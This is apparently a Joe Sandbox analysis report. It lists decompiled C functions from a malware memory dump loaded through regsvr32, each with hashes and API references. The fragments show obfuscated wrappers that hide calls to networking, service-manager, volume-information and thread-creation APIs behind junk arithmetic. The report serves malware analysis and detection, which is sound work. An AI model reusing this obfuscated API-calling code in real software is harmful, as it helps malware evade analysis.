                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: o;a$!$CJD
                                                                                                            • API String ID: 1029625771-3784180784
                                                                                                            • Opcode ID: 150cdb39f3a0c76e5251988e351099073ad544735b10fe3a062043cf48863455
                                                                                                            • Instruction ID: 5ebfe2cc97397ff0b03a5117f3b7fbbf9532ab30ed186f1ce37406860407968c
                                                                                                            • Opcode Fuzzy Hash: 150cdb39f3a0c76e5251988e351099073ad544735b10fe3a062043cf48863455
                                                                                                            • Instruction Fuzzy Hash: 311112B6D01308BBCB01EFA8C80988EBBB4EB10318F508088E91566251E3B99B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 771 4d48b54-4d48c02 call 4d432c4 call 4d352f2 FindClose
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E04D48B54(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				void* _t41;
                                                                                                            				int _t52;
                                                                                                            				signed int _t54;
                                                                                                            				signed int _t55;
                                                                                                            
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				E04D432C4(_t41);
                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                            				_v24 = 0x72df4;
                                                                                                            				_v8 = 0x42e349;
                                                                                                            				_v8 = _v8 >> 0xa;
                                                                                                            				_v8 = _v8 + 0xffff20e0;
                                                                                                            				_t54 = 0x77;
                                                                                                            				_v8 = _v8 * 0x34;
                                                                                                            				_v8 = _v8 ^ 0xffdf8f4b;
                                                                                                            				_v16 = 0x3969b0;
                                                                                                            				_t55 = 0x67;
                                                                                                            				_v16 = _v16 / _t54;
                                                                                                            				_v16 = _v16 / _t55;
                                                                                                            				_v16 = _v16 ^ 0x000710ec;
                                                                                                            				_v12 = 0x8869f2;
                                                                                                            				_v12 = _v12 ^ 0x55ad3f7d;
                                                                                                            				_v12 = _v12 | 0x60fec989;
                                                                                                            				_v12 = _v12 ^ 0x75f884ef;
                                                                                                            				E04D352F2(_t55, _v16 % _t55, _t55, 0x1de, 0xd9d5df36, 0x9f49d153);
                                                                                                            				_t52 = FindClose(_a8); // executed
                                                                                                            				return _t52;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • FindClose.KERNEL32(000710EC), ref: 04D48BFD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID: IB$i
                                                                                                            • API String ID: 1863332320-2104615138
                                                                                                            • Opcode ID: 4596798b6602728b799d3259544286cac836a557a45c9f8fc8221b302c17ffb0
                                                                                                            • Instruction ID: ba6c42c1af0f4c1662415f51c189c918e441bfb86fa0d922bb0f18c5cf9b10dc
                                                                                                            • Opcode Fuzzy Hash: 4596798b6602728b799d3259544286cac836a557a45c9f8fc8221b302c17ffb0
                                                                                                            • Instruction Fuzzy Hash: 5A113AB6E05208FBDB04EFE9D94699DFBB1EF40304F20C189E514A7250E7B55B149F84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 51%
                                                                                                            			E04D48A6A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a28, intOrPtr _a36, void* _a44, unsigned int _a52) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				void* _t56;
                                                                                                            				signed int _t59;
                                                                                                            				long _t63;
                                                                                                            				short _t64;
                                                                                                            
                                                                                                            				_t64 = _a52;
                                                                                                            				_push(0);
                                                                                                            				_t63 = __ecx;
                                                                                                            				_push(_t64 & 0x0000ffff);
                                                                                                            				_push(0);
                                                                                                            				_push(_a44);
                                                                                                            				_push(0);
                                                                                                            				_push(_a36);
                                                                                                            				_push(0);
                                                                                                            				_push(_a28);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t64 & 0x0000ffff);
                                                                                                            				_v24 = 0x7c054;
                                                                                                            				_v20 = 0x1ca5;
                                                                                                            				_v16 = 0x3b063;
                                                                                                            				_v8 = 0xba1fa2;
                                                                                                            				_v8 = _v8 + 0xffffbbc8;
                                                                                                            				_v8 = _v8 ^ 0xed56c626;
                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                            				_v8 = _v8 ^ 0xbc79396b;
                                                                                                            				_a52 = 0x616d25;
                                                                                                            				_a52 = _a52 ^ 0xd5649618;
                                                                                                            				_a52 = _a52 >> 0xc;
                                                                                                            				_a52 = _a52 + 0xffffe306;
                                                                                                            				_a52 = _a52 ^ 0x00050871;
                                                                                                            				_v12 = 0xfb4c31;
                                                                                                            				_t59 = 0x7f;
                                                                                                            				_v12 = _v12 / _t59;
                                                                                                            				_v12 = _v12 | 0xb477662e;
                                                                                                            				_v12 = _v12 ^ 0xb47687c7;
                                                                                                            				E04D352F2(_t59, _v12 % _t59, _t59, 0xa9, 0x35b62607, 0xfd56727);
                                                                                                            				_t56 = InternetConnectW(_a44, _a28, _t64, 0, 0, _t63, 0, 0); // executed
                                                                                                            				return _t56;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 04D48B4B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConnectInternet
                                                                                                            • String ID: %ma
                                                                                                            • API String ID: 3050416762-723589437
                                                                                                            • Opcode ID: 5383d73b74ea1e0117a4218152230cce157a91d3f2fbedc2d579a65b31a39fbe
                                                                                                            • Instruction ID: 31554a02a267bfbbb4a3d32bf896c908778089128910615b40df0f4e349f20af
                                                                                                            • Opcode Fuzzy Hash: 5383d73b74ea1e0117a4218152230cce157a91d3f2fbedc2d579a65b31a39fbe
                                                                                                            • Instruction Fuzzy Hash: 302126B690020CBFEF45DE95DC85CEE7F79EB54798F504048F90562120C3759AA4DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 39%
                                                                                                            			E04D4B3A1(void* __ecx, DWORD* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a36, WCHAR* _a40) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				void* _t32;
                                                                                                            				int _t41;
                                                                                                            				DWORD* _t46;
                                                                                                            
                                                                                                            				_t46 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a40);
                                                                                                            				_push(_a36);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(0);
                                                                                                            				_push(_a12);
                                                                                                            				_push(0);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(0);
                                                                                                            				E04D432C4(_t32);
                                                                                                            				_v32 = 0xa2843;
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				_v16 = 0x24f12a;
                                                                                                            				_v16 = _v16 ^ 0xf34cd37c;
                                                                                                            				_v16 = _v16 ^ 0xf36a1f11;
                                                                                                            				_v12 = 0x881ebb;
                                                                                                            				_v12 = _v12 * 0x3f;
                                                                                                            				_v12 = _v12 + 0x496;
                                                                                                            				_v12 = _v12 ^ 0x21781a87;
                                                                                                            				_v8 = 0x6f5ef9;
                                                                                                            				_v8 = _v8 >> 0xf;
                                                                                                            				_v8 = _v8 * 0x4d;
                                                                                                            				_v8 = _v8 ^ 0x000cfc14;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x172, 0xf54564f2, 0x9f49d153);
                                                                                                            				_t41 = GetVolumeInformationW(_a40, 0, 0, _t46, 0, 0, 0, 0); // executed
                                                                                                            				return _t41;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04D4B453
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationVolume
                                                                                                            • String ID: C(
                                                                                                            • API String ID: 2039140958-806726975
                                                                                                            • Opcode ID: e71f333ac6984e21a869638b68aa1375949e08e3d88665a223140ac073d4a287
                                                                                                            • Instruction ID: 560b90276fe18cc0ae2b3d45f8dc6959ddf5df1985a655c862d15bc01fa34861
                                                                                                            • Opcode Fuzzy Hash: e71f333ac6984e21a869638b68aa1375949e08e3d88665a223140ac073d4a287
                                                                                                            • Instruction Fuzzy Hash: 4B2113B190020CBFAF00DFE8CC858EFBBB9EB45398F118098F914A6121D3754E519B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E04D42E17(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a32, intOrPtr _a40, long _a44, void* _a48) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				WCHAR* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				void* _t41;
                                                                                                            				void* _t49;
                                                                                                            				signed int _t51;
                                                                                                            				WCHAR* _t56;
                                                                                                            
                                                                                                            				_t56 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a48);
                                                                                                            				_push(_a44);
                                                                                                            				_push(_a40);
                                                                                                            				_push(0);
                                                                                                            				_push(_a32);
                                                                                                            				_push(0);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(0);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				E04D432C4(_t41);
                                                                                                            				_v24 = 0x2e02d;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0x612363;
                                                                                                            				_v12 = _v12 >> 7;
                                                                                                            				_v12 = _v12 ^ 0xa96d4967;
                                                                                                            				_v12 = _v12 ^ 0xa962ccc6;
                                                                                                            				_v16 = 0xd5e350;
                                                                                                            				_t51 = 0x24;
                                                                                                            				_v16 = _v16 / _t51;
                                                                                                            				_v16 = _v16 ^ 0x000eb4be;
                                                                                                            				_v8 = 0x999eee;
                                                                                                            				_v8 = _v8 + 0xffff4f27;
                                                                                                            				_v8 = _v8 << 0xc;
                                                                                                            				_v8 = _v8 ^ 0x8eeebf7c;
                                                                                                            				E04D352F2(_t51, _v16 % _t51, _t51, 0xf3, 0xbc446173, 0xfd56727);
                                                                                                            				_t49 = HttpOpenRequestW(_a48, _t56, _a32, 0, 0, 0, _a44, 0); // executed
                                                                                                            				return _t49;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,?,00000000), ref: 04D42ED2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpOpenRequest
                                                                                                            • String ID: c#a
                                                                                                            • API String ID: 1984915467-835488452
                                                                                                            • Opcode ID: 3fdfa86631890540a25b11f56de3f04caa32aa01d3697e5367734a1257b0e5e4
                                                                                                            • Instruction ID: 228c49cb1c021e7995a6f4958cf5b6b2d292d6fe1c46f2cf1b3ea30e63fc600e
                                                                                                            • Opcode Fuzzy Hash: 3fdfa86631890540a25b11f56de3f04caa32aa01d3697e5367734a1257b0e5e4
                                                                                                            • Instruction Fuzzy Hash: D021E572901248BBDF25DF96DD49CCFBFB5EF85714F108089F91462260C3769A60DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E04D4C56F(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t41;
                                                                                                            				int _t53;
                                                                                                            				signed int _t55;
                                                                                                            				signed int _t56;
                                                                                                            				struct _WIN32_FIND_DATAW* _t62;
                                                                                                            
                                                                                                            				_push(_a12);
                                                                                                            				_t62 = __ecx;
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t41);
                                                                                                            				_v20 = 0x30735;
                                                                                                            				_v16 = 0x8440e;
                                                                                                            				_v16 = 0x654a7d;
                                                                                                            				_t55 = 0x61;
                                                                                                            				_v16 = _v16 / _t55;
                                                                                                            				_v16 = _v16 | 0x2d9bb191;
                                                                                                            				_v16 = _v16 ^ 0x2d914966;
                                                                                                            				_v8 = 0xff625a;
                                                                                                            				_t56 = 0xc;
                                                                                                            				_v8 = _v8 * 6;
                                                                                                            				_v8 = _v8 + 0xdd3a;
                                                                                                            				_v8 = _v8 * 0x19;
                                                                                                            				_v8 = _v8 ^ 0x95bddad4;
                                                                                                            				_v12 = 0x43acd8;
                                                                                                            				_v12 = _v12 / _t56;
                                                                                                            				_v12 = _v12 | 0x00319689;
                                                                                                            				_v12 = _v12 ^ 0x0033b9cb;
                                                                                                            				E04D352F2(_t56, _v12 % _t56, _t56, 0x3b, 0xae9ba2a6, 0x9f49d153);
                                                                                                            				_t53 = FindNextFileW(_a12, _t62); // executed
                                                                                                            				return _t53;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(00030735,?,?,?,?,?,?,?,?,?,00000000), ref: 04D4C622
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID: }Je
                                                                                                            • API String ID: 2029273394-2485522505
                                                                                                            • Opcode ID: 52e4fe87039520034ed7cb141ccb9f657951214b020a62a818a80c92f236f878
                                                                                                            • Instruction ID: 2129a641c1d0aba87080721382aaabcec251a094f3d740f2a83f33d79c89cbce
                                                                                                            • Opcode Fuzzy Hash: 52e4fe87039520034ed7cb141ccb9f657951214b020a62a818a80c92f236f878
                                                                                                            • Instruction Fuzzy Hash: 66111275E01208FBDB08DFA8C94A9DEBBB5EF84308F10C08AE514AB290D7B55B609F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E04D4C75F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, _Unknown_base(*)()* _a20, intOrPtr _a28, intOrPtr _a36, void* _a40) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t36;
                                                                                                            				void* _t42;
                                                                                                            
                                                                                                            				_push(_a40);
                                                                                                            				_push(_a36);
                                                                                                            				_push(0);
                                                                                                            				_push(_a28);
                                                                                                            				_push(0);
                                                                                                            				_push(_a20);
                                                                                                            				_push(0);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(0);
                                                                                                            				E04D432C4(_t36);
                                                                                                            				_v20 = 0xee8fa;
                                                                                                            				_v16 = 0x7f72f;
                                                                                                            				_v8 = 0xc6c601;
                                                                                                            				_v8 = _v8 ^ 0x96666c5f;
                                                                                                            				_v8 = _v8 ^ 0x5e433dc1;
                                                                                                            				_v8 = _v8 | 0xf2f1b058;
                                                                                                            				_v8 = _v8 ^ 0xfafb5737;
                                                                                                            				_v12 = 0x6e7c29;
                                                                                                            				_v12 = _v12 + 0xffffc27b;
                                                                                                            				_v12 = _v12 ^ 0x85c33015;
                                                                                                            				_v12 = _v12 ^ 0x85aebf57;
                                                                                                            				_v16 = 0xeab111;
                                                                                                            				_v16 = _v16 | 0x204fbcf6;
                                                                                                            				_v16 = _v16 ^ 0x20e65893;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x92, 0xdd7144f, 0x9f49d153);
                                                                                                            				_t42 = CreateThread(0, 0, _a20, _a40, 0, 0); // executed
                                                                                                            				return _t42;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 04D4C817
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID: )|n
                                                                                                            • API String ID: 2422867632-3781025496
                                                                                                            • Opcode ID: 7d081b82da2f2b765c1eff5e522bd657fe3a5c64de1db55e13d9ac54ccac50ef
                                                                                                            • Instruction ID: 41dbd3c66b0a41b0224726b885038d6dd71884e9edb66fd1e0a50af3770f6a22
                                                                                                            • Opcode Fuzzy Hash: 7d081b82da2f2b765c1eff5e522bd657fe3a5c64de1db55e13d9ac54ccac50ef
                                                                                                            • Instruction Fuzzy Hash: 3F11037690122CBBCF149FE59D4A8DEBF79EF09254F108188B92966120C3759761DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 66%
                                                                                                            			E04D47E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				short* _v20;
                                                                                                            				short* _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t33;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(0);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(0);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t33);
                                                                                                            				_v28 = 0x38698;
                                                                                                            				_v24 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0xf80068;
                                                                                                            				_v12 = _v12 << 8;
                                                                                                            				_v12 = _v12 + 0x9c2a;
                                                                                                            				_v12 = _v12 ^ 0xf804c3a3;
                                                                                                            				_v8 = 0xd3ebc3;
                                                                                                            				_v8 = _v8 << 0x10;
                                                                                                            				_v8 = _v8 >> 0x10;
                                                                                                            				_v8 = _v8 * 0xd;
                                                                                                            				_v8 = _v8 ^ 0x000f62ee;
                                                                                                            				_v16 = 0x690a65;
                                                                                                            				_v16 = _v16 | 0xebc01c25;
                                                                                                            				_v16 = _v16 ^ 0xebe7ec5f;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
                                                                                                            				_t40 = OpenSCManagerW(0, 0, _a20); // executed
                                                                                                            				return _t40;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D47EB2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ManagerOpen
                                                                                                            • String ID: _
                                                                                                            • API String ID: 1889721586-4005583852
                                                                                                            • Opcode ID: cd0a3c79c6f3ca0c79df2846f63ac2039db8adcf820d722151e0df909790d772
                                                                                                            • Instruction ID: 79789ce0d45bacd7e74a2f80158f454d8a995d61a84740fb8f1e4a46ac3c3aea
                                                                                                            • Opcode Fuzzy Hash: cd0a3c79c6f3ca0c79df2846f63ac2039db8adcf820d722151e0df909790d772
                                                                                                            • Instruction Fuzzy Hash: 231136B5C01218FBDF01DF98D84A8CEBFB9EF04344F108089E815A2241D3B58B20EFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E04D32CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t35;
                                                                                                            				void* _t42;
                                                                                                            				void* _t45;
                                                                                                            
                                                                                                            				_push(_a16);
                                                                                                            				_t45 = __edx;
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t35);
                                                                                                            				_v20 = 0xfe94d;
                                                                                                            				_v16 = 0xab1c4;
                                                                                                            				_v16 = 0x50de48;
                                                                                                            				_v16 = _v16 * 0x6c;
                                                                                                            				_v16 = _v16 << 0x10;
                                                                                                            				_v16 = _v16 ^ 0xc664fcf6;
                                                                                                            				_v8 = 0xfaad6e;
                                                                                                            				_v8 = _v8 << 0xf;
                                                                                                            				_v8 = _v8 + 0xffffd3fa;
                                                                                                            				_v8 = _v8 ^ 0xf4e1ffa5;
                                                                                                            				_v8 = _v8 ^ 0xa25eb8a6;
                                                                                                            				_v12 = 0xe37a21;
                                                                                                            				_v12 = _v12 << 0xa;
                                                                                                            				_v12 = _v12 << 9;
                                                                                                            				_v12 = _v12 ^ 0xd10447cc;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
                                                                                                            				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
                                                                                                            				return _t42;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,D10447CC,000FE94D,?,?,?,?,?,?,?,?,?,06CF77FE), ref: 04D32D68
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID: !z
                                                                                                            • API String ID: 1279760036-1244814218
                                                                                                            • Opcode ID: 0031c6f34620949ea4925af606efc386199e2d98a5126e840f02e2f08351811d
                                                                                                            • Instruction ID: d7d7c9e75e70687db84900bc525f1453e220078823e48f007bbee4c2ead25407
                                                                                                            • Opcode Fuzzy Hash: 0031c6f34620949ea4925af606efc386199e2d98a5126e840f02e2f08351811d
                                                                                                            • Instruction Fuzzy Hash: 5511DFB6D04208BBDB01EFE8D94A8DEBFB4EF45304F108488E92566251D3759B20EF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E04D39A95(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t37;
                                                                                                            				int _t48;
                                                                                                            				signed int _t50;
                                                                                                            
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				E04D432C4(_t37);
                                                                                                            				_v16 = 0x6c534;
                                                                                                            				_v16 = 0x35c0dd;
                                                                                                            				_v16 = _v16 >> 8;
                                                                                                            				_t50 = 0x1d;
                                                                                                            				_v16 = _v16 * 0x68;
                                                                                                            				_v16 = _v16 ^ 0x00172ee9;
                                                                                                            				_v12 = 0x8fc35e;
                                                                                                            				_v12 = _v12 << 1;
                                                                                                            				_v12 = _v12 / _t50;
                                                                                                            				_v12 = _v12 ^ 0x000a405d;
                                                                                                            				_v8 = 0xdb850d;
                                                                                                            				_v8 = _v8 / _t50;
                                                                                                            				_v8 = _v8 | 0x33c3aaf5;
                                                                                                            				_v8 = _v8 ^ 0x33c594a1;
                                                                                                            				E04D352F2(_t50, _v8 % _t50, _t50, 0x4f, 0x14006836, 0xfd56727);
                                                                                                            				_t48 = InternetCloseHandle(_a8); // executed
                                                                                                            				return _t48;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(00172EE9), ref: 04D39B29
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: ]@
                                                                                                            • API String ID: 1081599783-2341061354
                                                                                                            • Opcode ID: 818020f233355629962f419f42ddbe8f717f3b013ee50a7fc40fe265c6eaa119
                                                                                                            • Instruction ID: 945273e3a660ef2921d2a7f9477c77748f34749c6a91f801318d7590c87744b7
                                                                                                            • Opcode Fuzzy Hash: 818020f233355629962f419f42ddbe8f717f3b013ee50a7fc40fe265c6eaa119
                                                                                                            • Instruction Fuzzy Hash: DB112775E00208FBDF04DFE9C94699DBBB2EB44304F10C099E924AB250E7BA9B54DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
